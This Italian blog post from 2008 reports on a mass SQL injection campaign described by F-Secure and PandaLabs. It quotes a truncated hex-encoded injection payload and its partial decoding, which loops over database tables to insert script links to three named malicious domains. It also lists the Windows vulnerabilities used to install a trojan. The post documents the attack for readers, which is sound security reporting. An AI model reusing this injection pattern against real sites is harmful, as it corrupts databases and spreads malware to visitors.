SQL Injection di massa: nmidahena.com, aspder.com e nihaorr1.com



Interessante questa notizia presente sul sito di F-Secure: sarebbe in atto un 'attacco' che, sfruttando la SQL Injection, altera i campi di testo dei database di backend dei siti web vulnerabili 'inettando' codice html necessario al caricamente di un codice javascript 'malevolo'.

La stima di F-Secure realizzata cercando su Google la stringa 'iniettata' è di circa 510.000 pagine 'infettate' e effettivamente, riproducendo la query di ricerca il risultato si attesta sulle 502.000 pagine.

Come avviene l'infezione? Continuo a citare:
Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):

DECLARE%[email protected]%20NVARCHAR(4000);SET%[email protected]=CAST(0x440045004300
4C00410052004500200040005400200076006100720063006800610072
00280032003500350029002C0040004300200076006100720063006800
610072002800320035003500290020004400450043004C004100520045
0020005400610062006C0065005F0043007500720073006F0072002000
43005500520053004F005200200046004F0052002000730065006C0065
0063007400200061002E006E0061006D0065002C0062002E006E006100
6D0065002000660072006F006D0020007300790073006F0062006A0065
00630074007300200061002C0073007900730063006F006C0075006D00
6E00730020006200200077006800650072006500200061002E00690064
003D0062002E0069006400200061006E006400200061002E0078007400
7900700065003D00270075002700200061006E0064002000280062002E
00780074007900700065003D003900390020006F007200200062002E00
780074007900700065003D003300350020006…

Which when decoded becomes:

DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35
or b…

Il codice SQL eseguito comporterebbe appunto la modifica di tutti i campi di testo del database (solitamente utilizzati per archiviare i contenuti del sito) ai quali viene aggiunto un link a un file javascript  hostato su 3 diversi domini (nmidahena.com, aspder.com and nihaorr1.com, attualmente non raggiungibili)

Lo script avvia il caricamento dei file necessari ad utilizzare differenti exploit con lo scopo di installare un trojan sui client che incappano nel sito infetto.

Da PandaLabs cito l'elenco di vulnerabilità che il codice malevolo cerca di utilizzare per l'installazione del trojan:
MS06-014 Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution

MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution

MS07-018 Vulnerabilities in Microsoft Content Management Server Could Allow Remote Code Execution

MS07-033 Cumulative Security Update for Internet Explorer

MS07-055 Vulnerability in kodak Image Viewer Could Allow Remote Code Execution

[via F-Secure]

Published: April 24 2008

  • category: